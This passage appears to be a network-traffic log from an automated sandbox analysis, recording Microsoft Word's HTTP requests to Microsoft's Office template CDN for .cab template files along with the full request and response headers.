    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 31562
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: HW+Oc6BmKkjTMgkKTIyJjw==
    Last-Modified: Fri, 22 Apr 2016 16:09:40 GMT
    ETag: 0x8D36AC882C4ED43
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 748315c1-201e-0096-0397-a083fb000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sun, 26 May 2024 21:49:23 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851222.cab
    WINWORD.EXE
    Remote address:
    2.17.251.17:443
    Request
    GET /support/templates/en-us/tp02851222.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 28911
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: bXh7HiI9trkbaSOAYsyocg==
    Last-Modified: Fri, 22 Apr 2016 16:09:41 GMT
    ETag: 0x8D36AC8830E54C8
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: a51313b9-e01e-0100-5597-a07427000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sun, 26 May 2024 21:49:23 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851224.cab
    WINWORD.EXE
    Remote address:
    2.17.251.17:443
    Request
    GET /support/templates/en-us/tp02851224.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 30957
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: 08kDbk4RWegysbTS6dQr8A==
    Last-Modified: Fri, 22 Apr 2016 16:09:42 GMT
    ETag: 0x8D36AC883A171B7
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 050425c3-601e-0131-1e97-a09534000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sun, 26 May 2024 21:49:23 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851225.cab
    WINWORD.EXE
    Remote address:
    2.17.251.17:443
    Request
    GET /support/templates/en-us/tp02851225.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 31008
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: 4DPMvHunh6L4JM4JUuV9RA==
    Last-Modified: Fri, 22 Apr 2016 16:09:42 GMT
    ETag: 0x8D36AC883F49D7D
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 333d895c-301e-008a-7b97-a0d19b000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sun, 26 May 2024 21:49:23 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851226.cab
    WINWORD.EXE
    Remote address:
    2.17.251.17:443
    Request
    GET /support/templates/en-us/tp02851226.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 35519
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: U+6dpJ0LhDVwOOzzdoONLg==
    Last-Modified: Fri, 22 Apr 2016 16:09:43 GMT
    ETag: 0x8D36AC88440C433
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 2e8ae1bb-901e-00ce-4f97-a05ba4000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sun, 26 May 2024 21:49:23 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851227.cab
    WINWORD.EXE
    Remote address:
    2.17.251.17:443
    Request
    GET /support/templates/en-us/tp02851227.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 31471
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: karb7EFxz6gpK2GEkvXvNA==
    Last-Modified: Fri, 22 Apr 2016 16:09:43 GMT
    ETag: 0x8D36AC8848A0495
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 13033484-101e-00ef-6b97-a07fdf000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sun, 26 May 2024 21:49:23 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043001.cab
    WINWORD.EXE
    Remote address:
    2.17.251.17:443
    Request
    GET /support/templates/en-us/tp0309043001.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 307348
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: DrxFqg5nzENdB0VDg3H5SA==
    Last-Modified: Wed, 29 Aug 2018 18:20:24 GMT
    ETag: 0x8D60DDC169CBCB0
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: c55cc261-b01e-005b-2297-a03f15000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sun, 26 May 2024 21:49:23 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851223.cab
    WINWORD.EXE
    Remote address:
    2.17.251.17:443
    Request
    GET /support/templates/en-us/tp02851223.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 32833
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: IFr1FgTvlu8ejmAhJUH3Qg==
    Last-Modified: Fri, 22 Apr 2016 15:41:42 GMT
    ETag: 0x8D36AC49A4270D3
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: a445c8ca-501e-00f0-1697-a0e807000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sun, 26 May 2024 21:49:23 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043402.cab
    WINWORD.EXE
    Remote address:
    2.17.251.17:443
    Request
    GET /support/templates/en-us/tp0309043402.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 723359
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: dIpTxr3Vzpe9VKdsejNChg==
    Last-Modified: Wed, 29 Aug 2018 18:14:30 GMT
    ETag: 0x8D60DDB43B59EC5
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 3d093d5b-601e-0153-7197-a05713000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sun, 26 May 2024 21:49:23 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328893.cab
    WINWORD.EXE
    Remote address:
    2.17.251.17:443
    Request
    GET /support/templates/en-us/tp03328893.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 20235
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: 48ZBc7L0qnq3LhOWqVFL2A==
    Last-Modified: Fri, 22 Apr 2016 15:41:57 GMT
    ETag: 0x8D36AC4A3175138
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 3d2d7caf-b01e-0050-2697-a02761000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sun, 26 May 2024 21:49:23 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328905.cab
    WINWORD.EXE
    Remote address:
    2.17.251.17:443
    Request
    GET /support/templates/en-us/tp03328905.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 20457
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: TvpI7DB+ry+bNGoHPGf8+w==
    Last-Modified: Fri, 22 Apr 2016 16:09:46 GMT
    ETag: 0x8D36AC886167DDF
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 66a5b05a-401e-0074-0597-a0beda000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sun, 26 May 2024 21:49:23 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328908.cab
    WINWORD.EXE
    Remote address:
    2.17.251.17:443
    Request
    GET /support/templates/en-us/tp03328908.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 31083
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: iamBjmZY1zpztkJSL/hwHw==
    Last-Modified: Fri, 22 Apr 2016 15:41:40 GMT
    ETag: 0x8D36AC498DE687B
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: c5200cc9-a01e-00a1-5597-a0f6f2000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sun, 26 May 2024 21:49:23 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328916.cab
    WINWORD.EXE
    Remote address:
    2.17.251.17:443
    Request
    GET /support/templates/en-us/tp03328916.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 26944
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: +RPdhJFXUwQthWzsTl2rpQ==
    Last-Modified: Fri, 22 Apr 2016 16:09:47 GMT
    ETag: 0x8D36AC886C4C4EE
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 621faa23-601e-00ca-3c97-a0d6a3000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sun, 26 May 2024 21:49:23 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328919.cab
    WINWORD.EXE
    Remote address:
    2.17.251.17:443
    Request
    GET /support/templates/en-us/tp03328919.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 22149
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: ZsUZnPT7GL1Pnz8sywdABw==
    Last-Modified: Fri, 22 Apr 2016 15:41:40 GMT
    ETag: 0x8D36AC4992C63CE
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: f67f6439-f01e-00b9-7e97-a0db67000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sun, 26 May 2024 21:49:23 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328925.cab
    WINWORD.EXE
    Remote address:
    2.17.251.17:443
    Request
    GET /support/templates/en-us/tp03328925.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 25314
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: xH40MK+BPfiwLhy0gp3ZSw==
    Last-Modified: Fri, 22 Apr 2016 16:09:48 GMT
    ETag: 0x8D36AC8875AEF5A
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 2f99a54d-f01e-011c-6c97-a02647000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sun, 26 May 2024 21:49:23 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392101.cab
    WINWORD.EXE
    Remote address:
    2.17.251.17:443
    Request
    GET /support/templates/en-us/tp0403392101.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 1881952
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: U8X0WyLhM7KNS9O1o1D9vQ==
    Last-Modified: Wed, 29 Aug 2018 18:19:46 GMT
    ETag: 0x8D60DDC004A49D0
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: f466f8b0-201e-0010-2f97-a04f42000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sun, 26 May 2024 21:49:24 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328932.cab
    WINWORD.EXE
    Remote address:
    2.17.251.17:443
    Request
    GET /support/templates/en-us/tp03328932.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 20554
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: SGy8siO4cxMv+vS4rQrQRA==
    Last-Modified: Fri, 22 Apr 2016 16:09:49 GMT
    ETag: 0x8D36AC887A4CC19
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 867275a6-c01e-0037-5197-a05886000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sun, 26 May 2024 21:49:23 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391901.cab
    WINWORD.EXE
    Remote address:
    2.17.251.17:443
    Request
    GET /support/templates/en-us/tp0403391901.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 1097591
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: v5XpZ+fRzsjv5Ca8ASfT3g==
    Last-Modified: Wed, 29 Aug 2018 18:16:09 GMT
    ETag: 0x8D60DDB7EAA50F0
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: ceee4029-b01e-00bb-2c97-a03088000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sun, 26 May 2024 21:49:24 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328935.cab
    WINWORD.EXE
    Remote address:
    2.17.251.17:443
    Request
    GET /support/templates/en-us/tp03328935.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 23597
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: fGRexQWYL+Up0OUDWzeP/A==
    Last-Modified: Fri, 22 Apr 2016 15:41:41 GMT
    ETag: 0x8D36AC49996C1E0
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 8477cc39-f01e-00df-0497-a0693d000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sun, 26 May 2024 21:49:24 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328940.cab
    WINWORD.EXE
    Remote address:
    2.17.251.17:443
    Request
    GET /support/templates/en-us/tp03328940.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 21791
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: e/iLPKIOtx7UU6M2GQjgEA==
    Last-Modified: Fri, 22 Apr 2016 16:09:50 GMT
    ETag: 0x8D36AC8883A8134
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 3aee714a-001e-0065-6f97-a0246e000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sun, 26 May 2024 21:49:24 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111502.cab
    WINWORD.EXE
    Remote address:
    2.17.251.17:443
    Request
    GET /support/templates/en-us/tp1000111502.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 230916
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: k/qfd5Ugqy0irE6oZLe7NA==
    Last-Modified: Thu, 12 Jul 2018 00:23:55 GMT
    ETag: 0x8D5E78DC0BDFFD8
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 4fca6d0a-e01e-006a-5297-a064c2000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sun, 26 May 2024 21:49:24 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328951.cab
    WINWORD.EXE
    Remote address:
    2.17.251.17:443
    Request
    GET /support/templates/en-us/tp03328951.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
